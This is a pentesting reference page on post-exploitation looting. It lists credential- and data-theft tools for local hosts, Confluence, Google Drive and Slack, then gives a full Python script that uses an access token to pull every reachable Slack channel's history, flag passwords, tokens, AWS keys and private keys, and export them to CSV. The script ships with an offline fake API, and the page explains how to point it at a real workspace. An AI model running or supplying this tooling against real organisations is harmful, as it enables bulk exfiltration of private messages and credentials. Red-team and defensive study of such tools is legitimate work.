Pentesting

Post Exploitation

Local l00t

  • PEASS-ng: These scripts, apart from looking for privilege escalation (PE) vectors, also search the filesystem for sensitive information (credential files, keys, passwords in configs, etc.).

  • LaZagne: The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext, APIs, custom algorithms, databases, etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.

External Services

  • Conf-Thief: This module connects to Confluence's API using an access token, exports to PDF, and downloads the Confluence documents that the target has access to.

  • GD-Thief: Red Team tool for exfiltrating files from a target's Google Drive that you (the attacker) have access to, via the Google Drive API. This includes all shared files, all files from shared drives, and all files from domain drives that the target has access to.

  • GDir-Thief: Red Team tool for exfiltrating the target organization's Google People Directory that you have access to, via Google's People API.

  • SlackPirate: This is a tool developed in Python which uses the native Slack APIs to extract 'interesting' information from a Slack workspace given an access token.

  • Slackhound: Slackhound is a command line tool for red and blue teams to quickly perform reconnaissance of a Slack workspace/organization. Slackhound makes an organization's users, files, messages, etc. quickly searchable, and large objects are written to CSV for offline review.
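All of the tools above follow the same pattern: take an access token the target already has, page through a SaaS API, and pull down or search whatever that token can reach. As an added example written for this page (not SlackPirate's or Slackhound's own code), the script below does that against the Slack Web API: it pages through `conversations.list` and `conversations.history` with the cursor pagination those methods use, greps every message for credential-looking strings, and writes the results to CSV for offline review. The HTTP transport is injectable, so the demo at the bottom runs against a constructed in-memory fake of the API (`FAKE_RESPONSES`, made-up channels and messages) rather than the network; the secret patterns are a small assumed set.

```python
"""
Token-based Slack workspace looting, written from scratch as an example:
page through channels and their history with an access token, grep messages
for secrets, and emit CSV. The transport is injectable so the demo runs offline.
"""
import csv
import io
import json
import re
import urllib.parse
import urllib.request

SLACK_API = "https://slack.com/api/"

# Credential-looking content. Small assumed set; real tools carry far more.
SECRET_PATTERNS = {
    "password": re.compile(r"(?i)\b(pass(word|wd)?|pwd)\s*[:=]\s*\S+"),
    "slack_token": re.compile(r"\bxox[abprs]-[0-9A-Za-z-]{10,}"),
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def http_request(token, method, params):
    """Real transport: POST form-encoded params to the Web API with a Bearer token."""
    data = urllib.parse.urlencode(params).encode()
    req = urllib.request.Request(SLACK_API + method, data=data,
                                 headers={"Authorization": f"Bearer {token}"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def paginate(request, token, method, params, key):
    """Yield items from a cursor-paginated method until next_cursor comes back empty."""
    cursor = ""
    while True:
        page = request(token, method, {**params, "cursor": cursor, "limit": 200})
        if not page.get("ok"):
            raise RuntimeError(f"{method} failed: {page.get('error')}")
        yield from page.get(key, [])
        cursor = page.get("response_metadata", {}).get("next_cursor", "")
        if not cursor:
            return


def loot_workspace(token, request=http_request):
    """Enumerate channels the token can see, pull their history, flag secrets."""
    messages, hits = [], []
    for ch in paginate(request, token, "conversations.list",
                       {"types": "public_channel,private_channel"}, "channels"):
        for msg in paginate(request, token, "conversations.history",
                            {"channel": ch["id"]}, "messages"):
            text = msg.get("text", "")
            row = {"channel": ch["name"], "user": msg.get("user", ""),
                   "ts": msg.get("ts", ""), "text": text}
            messages.append(row)
            for label, rx in SECRET_PATTERNS.items():
                if rx.search(text):
                    hits.append({**row, "pattern": label})
    return messages, hits


def to_csv(rows, fieldnames):
    """Serialise rows as CSV text (write it to a file for offline review)."""
    out = io.StringIO()
    writer = csv.DictWriter(out, fieldnames=fieldnames)
    writer.writeheader()
    writer.writerows(rows)
    return out.getvalue()


# Constructed fake of the API for the offline demo; none of this is real workspace data.
FAKE_RESPONSES = {
    ("conversations.list", ""): {
        "ok": True, "channels": [{"id": "C001", "name": "general"}],
        "response_metadata": {"next_cursor": "page2"}},
    ("conversations.list", "page2"): {
        "ok": True, "channels": [{"id": "C002", "name": "ops-secrets"}],
        "response_metadata": {"next_cursor": ""}},
    ("conversations.history", "C001", ""): {
        "ok": True, "messages": [{"user": "U1", "ts": "1.0", "text": "lunch?"}],
        "response_metadata": {"next_cursor": ""}},
    ("conversations.history", "C002", ""): {
        "ok": True, "messages": [
            {"user": "U2", "ts": "2.0", "text": "db password = hunter2"},
            {"user": "U3", "ts": "3.0", "text": "bot token xoxb-1234567890-abcdef"}],
        "response_metadata": {"next_cursor": ""}},
}


def fake_request(token, method, params):
    """Stand-in for http_request that answers from FAKE_RESPONSES."""
    if not token.startswith("xox"):
        return {"ok": False, "error": "invalid_auth"}  # mirrors the API's error shape
    if method == "conversations.list":
        return FAKE_RESPONSES[(method, params["cursor"])]
    return FAKE_RESPONSES[(method, params["channel"], params["cursor"])]


if __name__ == "__main__":
    msgs, found = loot_workspace("xoxp-demo-token", request=fake_request)
    print(to_csv(msgs, ["channel", "user", "ts", "text"]))
    print(to_csv(found, ["channel", "user", "ts", "pattern", "text"]))
```

Drop the `request=fake_request` argument and pass a real `xoxp-`/`xoxb-` token to run it against a workspace; what you get back is bounded by that token's scopes, which is why the tools above ask for a token rather than credentials. The fake also shows the failure mode worth handling: a revoked or wrong token comes back as `ok: false` with an `error` field, not an HTTP error, so check `ok` on every page.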